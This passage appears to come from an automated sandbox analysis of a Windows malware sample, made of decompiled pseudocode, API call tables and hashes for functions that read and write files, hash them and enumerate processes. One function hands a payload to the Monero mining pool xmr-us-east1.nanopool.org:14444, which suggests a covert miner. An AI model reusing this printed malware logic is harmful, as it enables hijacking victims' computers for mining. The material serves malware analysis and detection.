											_t83 = NtCreateFile( &_v12, 0x120116,  &_v60,  &_v36,  &_v68, 0x80, 0, 0, 0x60, 0, 0); // executed
											if(_t83 != 0) {
												L16:
												VirtualFree(_t109, 0, 0x8000);
												_t85 = E00407ED0(_t104);
												asm("sbb eax, eax");
												return  ~( ~_t85);
											} else {
												_v20 = _t83;
												_v16 = _t83;
												_t90 =  *0x5d10c0(_v12, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, _t83); // executed
												_push(_v12);
												if(_t90 == 0) {
													NtClose();
													VirtualFree(_t109, 0, 0x8000); // executed
													return 1;
												} else {
													NtClose();
													goto L16;
												}
											}
										} else {
											VirtualFree(_t109, 0, 0x8000);
											return 0;
										}
									} else {
										NtClose(_v8);
										VirtualFree(_t109, 0, 0x8000);
										return 0;
									}
								} else {
									NtClose(_v8);
									return 0;
								}
							} else {
								NtClose(_v8);
								goto L6;
							}
						}
					}
				}
			}































                                                                                                                                          0x00406354
                                                                                                                                          0x0040635b
                                                                                                                                          0x0040635e
                                                                                                                                          0x00406368
                                                                                                                                          0x0040636f
                                                                                                                                          0x00406373
                                                                                                                                          0x0040637a
                                                                                                                                          0x00406381
                                                                                                                                          0x00406388
                                                                                                                                          0x0040638f
                                                                                                                                          0x00406396
                                                                                                                                          0x0040639d
                                                                                                                                          0x004063a4
                                                                                                                                          0x004063ab
                                                                                                                                          0x004063b2
                                                                                                                                          0x004063b7
                                                                                                                                          0x004063bc
                                                                                                                                          0x004063c4
                                                                                                                                          0x0040645f
                                                                                                                                          0x00406464
                                                                                                                                          0x004063d5
                                                                                                                                          0x004063d5
                                                                                                                                          0x004063d7
                                                                                                                                          0x004063dc
                                                                                                                                          0x004063e3
                                                                                                                                          0x004063ec
                                                                                                                                          0x00000000
                                                                                                                                          0x004063ee
                                                                                                                                          0x00406400
                                                                                                                                          0x00406407
                                                                                                                                          0x00406411
                                                                                                                                          0x0040641c
                                                                                                                                          0x0040642c
                                                                                                                                          0x00406434
                                                                                                                                          0x0040643b
                                                                                                                                          0x00406443
                                                                                                                                          0x00000000
                                                                                                                                          0x00406445
                                                                                                                                          0x00406445
                                                                                                                                          0x0040644c
                                                                                                                                          0x00406454
                                                                                                                                          0x00406472
                                                                                                                                          0x00406478
                                                                                                                                          0x0040647c
                                                                                                                                          0x004064a5
                                                                                                                                          0x004064ad
                                                                                                                                          0x004064d1
                                                                                                                                          0x004064d7
                                                                                                                                          0x004064dd
                                                                                                                                          0x004064df
                                                                                                                                          0x004064e1
                                                                                                                                          0x004064e2
                                                                                                                                          0x004064eb
                                                                                                                                          0x00406515
                                                                                                                                          0x0040651c
                                                                                                                                          0x00406526
                                                                                                                                          0x00406531
                                                                                                                                          0x00406541
                                                                                                                                          0x00406549
                                                                                                                                          0x00406550
                                                                                                                                          0x00406558
                                                                                                                                          0x00406589
                                                                                                                                          0x00406591
                                                                                                                                          0x00406598
                                                                                                                                          0x004065a2
                                                                                                                                          0x004065ab
                                                                                                                                          0x0040655a
                                                                                                                                          0x0040655b
                                                                                                                                          0x0040655e
                                                                                                                                          0x00406576
                                                                                                                                          0x0040657c
                                                                                                                                          0x00406581
                                                                                                                                          0x004065ac
                                                                                                                                          0x004065ba
                                                                                                                                          0x004065ca
                                                                                                                                          0x00406583
                                                                                                                                          0x00406583
                                                                                                                                          0x00000000
                                                                                                                                          0x00406583
                                                                                                                                          0x00406581
                                                                                                                                          0x004064ed
                                                                                                                                          0x004064f5
                                                                                                                                          0x00406502
                                                                                                                                          0x00406502
                                                                                                                                          0x004064af
                                                                                                                                          0x004064b2
                                                                                                                                          0x004064c0
                                                                                                                                          0x004064cc
                                                                                                                                          0x004064cc
                                                                                                                                          0x0040647e
                                                                                                                                          0x00406481
                                                                                                                                          0x0040648d
                                                                                                                                          0x0040648d
                                                                                                                                          0x00406456
                                                                                                                                          0x00406459
                                                                                                                                          0x00000000
                                                                                                                                          0x00406459
                                                                                                                                          0x00406454
                                                                                                                                          0x00406443
                                                                                                                                          0x004063ec

                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 004063BC
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 004063E4
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 0040643B
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0040644C
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00406459
                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?), ref: 00406472
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00406481
                                                                                                                                          • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004064A5
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004064B2
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064C0
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004064D1
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 004064E3
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064F5
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00406550
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406576
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00406583
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00406591
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004065AC
                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004065BA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseFile$Virtual$FreePath$Name$CreateName_$AllocModuleReadSizeWrite
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 1655568127-2766056989
                                                                                                                                          • Opcode ID: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
                                                                                                                                          • Instruction ID: 2fd8ed99f3ae58de8391e8baf5aa5f6abea6aa1d3bd579213be14ba4813b3cc0
                                                                                                                                          • Opcode Fuzzy Hash: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
                                                                                                                                          • Instruction Fuzzy Hash: B4715A71A4121CBBEB209F90DC49BEEBBB8FB08704F100126F605F62D0D7B55A588B99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408B20, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 152encryptionfileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                          			E00408B20(char _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				void* _t40;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr _t80;
				void* _t82;
				void* _t87;

				asm("movups xmm0, [0x40aa14]");
				_t39 =  *0x40aa24; // 0x0
				_t1 =  &_a4; // 0x40363e
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v24 = _t39;
				_t40 = CreateFileW( *_t1, 0x80000000, 1, 0, 3, 0x8000000, 0); // executed
				_t82 = _t40;
				if(_t82 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t42 =  &_v8;
					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000); // executed
					if(_t42 != 0) {
						_t43 =  &_v12;
						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43); // executed
						if(_t43 != 0) {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0); // executed
							if(_t46 == 0) {
								L11:
								_push(0);
								goto L12;
							} else {
								_t69 = __imp__CryptHashData;
								while(1) {
									_t72 = _v16;
									if(_t72 == 0) {
										break;
									}
									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
									_push(0);
									if(_t60 == 0) {
										L12:
										CryptReleaseContext(_v8);
										__imp__CryptDestroyHash(_v12);
										CloseHandle(_t82);
										L13:
										return 0;
									} else {
										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??); // executed
										if(_t46 != 0) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L20;
								}
								if(_t46 == 0) {
									goto L11;
								} else {
									_v20 = 0x10;
									_t51 =  &_v56;
									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
									if(_t51 == 0) {
										goto L13;
									} else {
										_t70 = _v20;
										_t75 = 0;
										if(_t70 != 0) {
											_t80 = _a8;
											asm("o16 nop [eax+eax]");
											do {
												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
												_t75 = _t75 + 1;
											} while (_t75 < _t70);
										}
										__imp__CryptDestroyHash(_v12);
										CryptReleaseContext(_v8, 0);
										FindCloseChangeNotification(_t82); // executed
										return 1;
									}
								}
							}
						} else {
							CloseHandle(_t82);
							CryptReleaseContext(_v8, 0);
							return 0;
						}
					} else {
						CloseHandle(_t82);
						goto L3;
					}
				}
				L20:
			}

























                                                                                                                                          0x00408b29
                                                                                                                                          0x00408b30
                                                                                                                                          0x00408b48
                                                                                                                                          0x00408b4b
                                                                                                                                          0x00408b52
                                                                                                                                          0x00408b59
                                                                                                                                          0x00408b60
                                                                                                                                          0x00408b67
                                                                                                                                          0x00408b6b
                                                                                                                                          0x00408b6e
                                                                                                                                          0x00408b74
                                                                                                                                          0x00408b79
                                                                                                                                          0x00408b9b
                                                                                                                                          0x00408ba1
                                                                                                                                          0x00408b7b
                                                                                                                                          0x00408b86
                                                                                                                                          0x00408b8a
                                                                                                                                          0x00408b92
                                                                                                                                          0x00408ba2
                                                                                                                                          0x00408bb2
                                                                                                                                          0x00408bba
                                                                                                                                          0x00408bf0
                                                                                                                                          0x00408bf4
                                                                                                                                          0x00408c33
                                                                                                                                          0x00408c33
                                                                                                                                          0x00000000
                                                                                                                                          0x00408bf6
                                                                                                                                          0x00408bf6
                                                                                                                                          0x00408c00
                                                                                                                                          0x00408c00
                                                                                                                                          0x00408c05
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00408c14
                                                                                                                                          0x00408c16
                                                                                                                                          0x00408c1a
                                                                                                                                          0x00408c35
                                                                                                                                          0x00408c38
                                                                                                                                          0x00408c41
                                                                                                                                          0x00408c48
                                                                                                                                          0x00408c4e
                                                                                                                                          0x00408c56
                                                                                                                                          0x00408c1c
                                                                                                                                          0x00408c2d
                                                                                                                                          0x00408c31
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00408c31
                                                                                                                                          0x00000000
                                                                                                                                          0x00408c1a
                                                                                                                                          0x00408c59
                                                                                                                                          0x00000000
                                                                                                                                          0x00408c5b
                                                                                                                                          0x00408c60
                                                                                                                                          0x00408c68
                                                                                                                                          0x00408c71
                                                                                                                                          0x00408c79
                                                                                                                                          0x00000000
                                                                                                                                          0x00408c7b
                                                                                                                                          0x00408c7b
                                                                                                                                          0x00408c7e
                                                                                                                                          0x00408c82
                                                                                                                                          0x00408c84
                                                                                                                                          0x00408c87
                                                                                                                                          0x00408c90
                                                                                                                                          0x00408c90
                                                                                                                                          0x00408ca2
                                                                                                                                          0x00408caa
                                                                                                                                          0x00408cae
                                                                                                                                          0x00408caf
                                                                                                                                          0x00408c90
                                                                                                                                          0x00408cb6
                                                                                                                                          0x00408cc1
                                                                                                                                          0x00408cc8
                                                                                                                                          0x00408cd9
                                                                                                                                          0x00408cd9
                                                                                                                                          0x00408c79
                                                                                                                                          0x00408c59
                                                                                                                                          0x00408bbc
                                                                                                                                          0x00408bbd
                                                                                                                                          0x00408bc8
                                                                                                                                          0x00408bd4
                                                                                                                                          0x00408bd4
                                                                                                                                          0x00408b94
                                                                                                                                          0x00408b95
                                                                                                                                          0x00000000
                                                                                                                                          0x00408b95
                                                                                                                                          0x00408b92
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateFileW.KERNELBASE(>6@,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00408B6E
                                                                                                                                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00408B8A
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408B95
                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00408BB2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408BBD
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00408BC8
                                                                                                                                          • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408BF0
                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00408C14
                                                                                                                                          • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408C2D
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408C38
                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408C41
                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00408C48
                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 00408C71
                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408CB6
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408CC1
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00408CC8
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Crypt$Hash$CloseContext$FileHandleRelease$CreateDestroyRead$AcquireChangeDataFindNotificationParam
                                                                                                                                          • String ID: >6@
                                                                                                                                          • API String ID: 2963825918-779403629
                                                                                                                                          • Opcode ID: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                                                          • Instruction ID: c20e288969fc02838bc95c2aa2b6e857bba7efe27eb6bc48cd55eb8ba344291c
                                                                                                                                          • Opcode Fuzzy Hash: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                                                          • Instruction Fuzzy Hash: 2751B271A01219BBEB209FA4DE45FEE7BB8EF48300F104075FA44B51E1DB75AE458B68
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004080E0, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130libraryprocessloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                          			E004080E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t34;
				int _t37;
				struct HINSTANCE__* _t39;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E00407EF0("explorer.exe");
				} else {
					_t69 = 0;
					_v308 = 0x128;
					_a4 = 0;
					_t30 = CreateToolhelp32Snapshot(2, 0); // executed
					_t61 = _t30;
					_v8 = _t61;
					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
						}
						Process32First(_t61,  &_v308); // executed
						_t34 = E00408DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300;
						} else {
							 *_t66(_v300,  &_a4);
							if(_a4 != _t69) {
								_t55 = E00401740("csrss.exe",  &_v272);
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E00401740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						_t37 = Process32Next(_v8,  &_v308); // executed
						if(_t37 != 0) {
							do {
								if(E00408DD0() == 0 || _t66 == 0) {
									L18:
									 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
									_t69 = _t69 + 1;
									if(_t69 < _a12) {
										goto L19;
									}
								} else {
									 *_t66(_v300,  &_a4); // executed
									if(_a4 == 0) {
										goto L19;
									} else {
										_t49 = E00401740("csrss.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t49 == 0) {
											goto L19;
										} else {
											_t51 = E00401740("winlogon.exe",  &_v272);
											_t72 = _t72 + 8;
											if(_t51 == 0) {
												goto L19;
											} else {
												goto L18;
											}
										}
									}
								}
								goto L20;
								L19:
								_t45 = Process32Next(_v8,  &_v308); // executed
							} while (_t45 != 0);
						}
						L20:
						CloseHandle(_v8);
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}























                                                                                                                                          0x004080ed
                                                                                                                                          0x00408261
                                                                                                                                          0x004080f3
                                                                                                                                          0x004080f5
                                                                                                                                          0x004080f7
                                                                                                                                          0x00408104
                                                                                                                                          0x00408107
                                                                                                                                          0x0040810c
                                                                                                                                          0x0040810e
                                                                                                                                          0x00408114
                                                                                                                                          0x00408124
                                                                                                                                          0x00408126
                                                                                                                                          0x0040812c
                                                                                                                                          0x00408131
                                                                                                                                          0x0040813f
                                                                                                                                          0x0040813f
                                                                                                                                          0x00408149
                                                                                                                                          0x0040814e
                                                                                                                                          0x00408153
                                                                                                                                          0x00408158
                                                                                                                                          0x0040819f
                                                                                                                                          0x004081a5
                                                                                                                                          0x004081aa
                                                                                                                                          0x0040815e
                                                                                                                                          0x00408168
                                                                                                                                          0x0040816d
                                                                                                                                          0x0040817b
                                                                                                                                          0x00408180
                                                                                                                                          0x00408185
                                                                                                                                          0x00408193
                                                                                                                                          0x00408198
                                                                                                                                          0x0040819d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040819d
                                                                                                                                          0x00408185
                                                                                                                                          0x0040816d
                                                                                                                                          0x004081b6
                                                                                                                                          0x004081bd
                                                                                                                                          0x004081c0
                                                                                                                                          0x004081c7
                                                                                                                                          0x0040820f
                                                                                                                                          0x00408215
                                                                                                                                          0x00408218
                                                                                                                                          0x0040821c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004081cd
                                                                                                                                          0x004081d7
                                                                                                                                          0x004081dd
                                                                                                                                          0x00000000
                                                                                                                                          0x004081df
                                                                                                                                          0x004081eb
                                                                                                                                          0x004081f0
                                                                                                                                          0x004081f5
                                                                                                                                          0x00000000
                                                                                                                                          0x004081f7
                                                                                                                                          0x00408203
                                                                                                                                          0x00408208
                                                                                                                                          0x0040820d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040820d
                                                                                                                                          0x004081f5
                                                                                                                                          0x004081dd
                                                                                                                                          0x00000000
                                                                                                                                          0x0040821e
                                                                                                                                          0x00408228
                                                                                                                                          0x0040822d
                                                                                                                                          0x004081c0
                                                                                                                                          0x00408231
                                                                                                                                          0x00408234
                                                                                                                                          0x0040823a
                                                                                                                                          0x00408240
                                                                                                                                          0x00408243
                                                                                                                                          0x00408243
                                                                                                                                          0x00408250
                                                                                                                                          0x00408116
                                                                                                                                          0x0040811d
                                                                                                                                          0x0040811d
                                                                                                                                          0x00408114

                                                                                                                                          APIs
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00408107
                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,004067D1,00000002,00000000,74B5F7F0,00000000), ref: 00408126
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 00408139
                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00408149
                                                                                                                                          • Process32Next.KERNEL32 ref: 004081B6
                                                                                                                                          • ProcessIdToSessionId.KERNELBASE(?,00000000,00001000,00000128,00000000,00000128), ref: 004081D7
                                                                                                                                          • Process32Next.KERNEL32 ref: 00408228
                                                                                                                                          • CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 00408234
                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00408243
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcProcessSessionSnapshotToolhelp32
                                                                                                                                          • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                                                          • API String ID: 1815987945-4289567422
                                                                                                                                          • Opcode ID: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                                                          • Instruction ID: e2503db8604718d0b55e8117c492ad94a53ae061e857ffc76dcc057c8b58004a
                                                                                                                                          • Opcode Fuzzy Hash: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                                                          • Instruction Fuzzy Hash: FC41A8759002186BDF10AF60DE41BEA77A8AF54345F0001BEFD44F62C1EF398E51CA99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004037E0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 127nativefilememoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                          			E004037E0(void* __eflags, char _a4) {
				void* _v8;
				long _v12;
				long _v16;
				long _v20;
				void* _v24;
				char _v32;
				long _v36;
				void* _v40;
				long _v44;
				long _v48;
				long _v52;
				long _v56;
				intOrPtr _v60;
				char* _v64;
				long _v68;
				void* _v72;
				void* _t35;
				long* _t45;
				void* _t50;
				intOrPtr _t59;
				void* _t60;

				_t1 =  &_a4; // 0x40476c
				_t59 =  *_t1;
				_t35 = E00407ED0(_t59); // executed
				if(_t35 == 0) {
					L11:
					return 0;
				} else {
					_push(0);
					_push(0);
					_v8 = 0;
					asm("xorps xmm0, xmm0");
					_v72 = 0;
					_push( &_v32);
					_push(_t59);
					asm("movups [ebp-0x40], xmm0");
					_v52 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v40 = 0;
					_v36 = 0;
					_v48 = 0;
					_v44 = 0;
					asm("movq [ebp-0x1c], xmm0");
					if( *0x5d10b8() != 1) {
						goto L11;
					} else {
						_v72 = 0x18;
						_v64 =  &_v32;
						_v68 = 0;
						_v60 = 0x40;
						_v56 = 0;
						_v52 = 0;
						if(NtCreateFile( &_v8, 0x120089,  &_v72,  &_v24,  &_v40, 0x80, 3, 1, 0x60, 0, 0) != 0) {
							goto L11;
						} else {
							_t45 =  &_v16;
							__imp__GetFileSizeEx(_v8, _t45);
							if(_t45 == 0 || _v16 != 0xcc8 || _v12 != 0) {
								L10:
								NtClose(_v8);
								goto L11;
							} else {
								_t60 = VirtualAlloc(0, 0xcc8, 0x3000, 4);
								if(_t60 == 0) {
									goto L10;
								} else {
									_t50 =  *0x5d10bc(_v8, 0, 0, 0,  &_v24, _t60, _v16,  &_v48, 0);
									_push(_v8);
									if(_t50 == 0) {
										NtClose();
										E00401640("xmr-us-east1.nanopool.org:14444", _t60, 0xcc8);
										E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
										VirtualFree(_t60, 0, 0x8000);
										return 1;
									} else {
										NtClose();
										VirtualFree(_t60, 0, 0x8000);
										return 0;
									}
								}
							}
						}
					}
				}
			}
























                                                                                                                                          0x004037e7
                                                                                                                                          0x004037e7
                                                                                                                                          0x004037eb
                                                                                                                                          0x004037f5
                                                                                                                                          0x0040399f
                                                                                                                                          0x004039a5
                                                                                                                                          0x004037fb
                                                                                                                                          0x004037fb
                                                                                                                                          0x004037fd
                                                                                                                                          0x00403802
                                                                                                                                          0x00403809
                                                                                                                                          0x0040380c
                                                                                                                                          0x00403813
                                                                                                                                          0x00403814
                                                                                                                                          0x00403815
                                                                                                                                          0x00403819
                                                                                                                                          0x00403820
                                                                                                                                          0x00403827
                                                                                                                                          0x0040382e
                                                                                                                                          0x00403835
                                                                                                                                          0x0040383c
                                                                                                                                          0x00403843
                                                                                                                                          0x0040384a
                                                                                                                                          0x00403851
                                                                                                                                          0x00403858
                                                                                                                                          0x00403865
                                                                                                                                          0x00000000
                                                                                                                                          0x0040386b
                                                                                                                                          0x0040387d
                                                                                                                                          0x00403884
                                                                                                                                          0x0040388e
                                                                                                                                          0x00403899
                                                                                                                                          0x004038a9
                                                                                                                                          0x004038b1
                                                                                                                                          0x004038c0
                                                                                                                                          0x00000000
                                                                                                                                          0x004038c6
                                                                                                                                          0x004038c6
                                                                                                                                          0x004038cd
                                                                                                                                          0x004038d5
                                                                                                                                          0x00403996
                                                                                                                                          0x00403999
                                                                                                                                          0x00000000
                                                                                                                                          0x004038f2
                                                                                                                                          0x00403906
                                                                                                                                          0x0040390a
                                                                                                                                          0x00000000
                                                                                                                                          0x00403910
                                                                                                                                          0x00403927
                                                                                                                                          0x0040392d
                                                                                                                                          0x00403932
                                                                                                                                          0x0040394f
                                                                                                                                          0x00403960
                                                                                                                                          0x00403976
                                                                                                                                          0x00403986
                                                                                                                                          0x00403995
                                                                                                                                          0x00403934
                                                                                                                                          0x00403934
                                                                                                                                          0x00403942
                                                                                                                                          0x0040394e
                                                                                                                                          0x0040394e
                                                                                                                                          0x00403932
                                                                                                                                          0x0040390a
                                                                                                                                          0x004038d5
                                                                                                                                          0x004038c0
                                                                                                                                          0x00403865

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(lG@,?,00000000,00000000), ref: 0040385D
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 004038B8
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 004038CD
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 00403900
                                                                                                                                          • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000CC8,00000000,00000000), ref: 00403927
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403934
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403942
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 0040394F
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403986
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403999
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseVirtual$FreePath$AllocAttributesCreateNameName_ReadSize
                                                                                                                                          • String ID: 0125789244697858$@$lG@$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 27938546-2795650337
                                                                                                                                          • Opcode ID: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                                                          • Instruction ID: 5038ae2be3a5952dc9e1581431ce3c004cda8172756abbfe488321c7fd1decdf
                                                                                                                                          • Opcode Fuzzy Hash: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                                                          • Instruction Fuzzy Hash: AF413DB0E41218BBEB209F94DD0AFDEBBB8AB04715F104167F504B52C0D7B95A488BA9
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004085B0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 105nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 76%
